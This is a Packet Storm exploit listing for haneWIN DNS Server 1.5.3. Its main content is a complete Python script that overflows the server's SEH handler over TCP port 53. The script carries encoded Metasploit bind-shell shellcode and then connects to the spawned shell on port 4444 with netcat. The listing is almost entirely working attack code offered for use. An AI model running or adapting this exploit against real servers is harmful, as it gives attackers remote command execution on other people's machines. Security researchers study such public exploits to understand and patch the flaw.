haneWIN DNS Server 1.5.3 Buffer Overflow

2014-01-29T00:00:00
ID PACKETSTORM:124995
Type packetstorm
Reporter Dario Estrada
Modified 2014-01-29T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
  
# Exploit Title: haneWIN DNS Server (SEH)  
# Author: Dario Estrada (dash) https://intrusionlabs.org  
# Date: 2014-01-29  
# Version: haneWIN DNS Server 1.5.3  
# Vendor Homepage: http://www.hanewin.net/  
# Vulnerable app link:http://www.hanewin.net/dns-e.htm  
# Tested on: Windows XP SP3  
# Thanks to God, to my family and all my friends for always being there  
#  
# Description:  
# A SEH overflow occurs when large amount of data is sent to the server  
#  
import socket, sys, os, time  
  
usage = "\n Usage: " + sys.argv[0] + " <host> \n"  
  
if len(sys.argv) < 2:  
print usage  
sys.exit(0)  
  
host = sys.argv[1]  
  
shellcode = (  
#msfpayload windows/shell_bind_tcp R | msfencode -t c -b '\x00\xff\x0a\x0d'  
"\xb8\xdf\x64\x04\x29\xd9\xc7\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"  
"\x56\x31\x45\x13\x83\xed\xfc\x03\x45\xd0\x86\xf1\xd5\x06\xcf"  
"\xfa\x25\xd6\xb0\x73\xc0\xe7\xe2\xe0\x80\x55\x33\x62\xc4\x55"  
"\xb8\x26\xfd\xee\xcc\xee\xf2\x47\x7a\xc9\x3d\x58\x4a\xd5\x92"  
"\x9a\xcc\xa9\xe8\xce\x2e\x93\x22\x03\x2e\xd4\x5f\xeb\x62\x8d"  
"\x14\x59\x93\xba\x69\x61\x92\x6c\xe6\xd9\xec\x09\x39\xad\x46"  
"\x13\x6a\x1d\xdc\x5b\x92\x16\xba\x7b\xa3\xfb\xd8\x40\xea\x70"  
"\x2a\x32\xed\x50\x62\xbb\xdf\x9c\x29\x82\xef\x11\x33\xc2\xc8"  
"\xc9\x46\x38\x2b\x74\x51\xfb\x51\xa2\xd4\x1e\xf1\x21\x4e\xfb"  
"\x03\xe6\x09\x88\x08\x43\x5d\xd6\x0c\x52\xb2\x6c\x28\xdf\x35"  
"\xa3\xb8\x9b\x11\x67\xe0\x78\x3b\x3e\x4c\x2f\x44\x20\x28\x90"  
"\xe0\x2a\xdb\xc5\x93\x70\xb4\x2a\xae\x8a\x44\x24\xb9\xf9\x76"  
"\xeb\x11\x96\x3a\x64\xbc\x61\x3c\x5f\x78\xfd\xc3\x5f\x79\xd7"  
"\x07\x0b\x29\x4f\xa1\x33\xa2\x8f\x4e\xe6\x65\xc0\xe0\x58\xc6"  
"\xb0\x40\x08\xae\xda\x4e\x77\xce\xe4\x84\x0e\xc8\x2a\xfc\x43"  
"\xbf\x4e\x02\x72\x63\xc6\xe4\x1e\x8b\x8e\xbf\xb6\x69\xf5\x77"  
"\x21\x91\xdf\x2b\xfa\x05\x57\x22\x3c\x29\x68\x60\x6f\x86\xc0"  
"\xe3\xfb\xc4\xd4\x12\xfc\xc0\x7c\x5c\xc5\x83\xf7\x30\x84\x32"  
"\x07\x19\x7e\xd6\x9a\xc6\x7e\x91\x86\x50\x29\xf6\x79\xa9\xbf"  
"\xea\x20\x03\xdd\xf6\xb5\x6c\x65\x2d\x06\x72\x64\xa0\x32\x50"  
"\x76\x7c\xba\xdc\x22\xd0\xed\x8a\x9c\x96\x47\x7d\x76\x41\x3b"  
"\xd7\x1e\x14\x77\xe8\x58\x19\x52\x9e\x84\xa8\x0b\xe7\xbb\x05"  
"\xdc\xef\xc4\x7b\x7c\x0f\x1f\x38\x8c\x5a\x3d\x69\x05\x03\xd4"  
"\x2b\x48\xb4\x03\x6f\x75\x37\xa1\x10\x82\x27\xc0\x15\xce\xef"  
"\x39\x64\x5f\x9a\x3d\xdb\x60\x8f"  
)  
  
nSEH = '\xeb\x06\x90\x90'  
SEH = '\xd1\x07\xfc\x7f'  
opcode = "\xe9\xdf\xf6\xff\xff"  
junk = 'A' * (2324 - len(shellcode))  
padding = 'A' * 600  
  
buff = shellcode + junk + nSEH + SEH + opcode + padding  
  
print "[+] Connecting to %s:53" % (host)  
try:  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((host, 53))  
aix= shellcode + 'A' * (2324 - len(shellcode))  
print "[*] Sending payload.." + " shellcode: " + str(len(shellcode))  
s.send(buff)  
print "[*] Exploit Sent Successfully!"  
s.close()  
print "[+] Waiting for 5 sec before spawning shell to " + host + ":4444\r"  
time.sleep(5)  
os.system ("nc -n " + host + " 4444")  
except:  
print "[!] Could not connect to " + host + ":53\r"  
sys.exit(0)  
  
`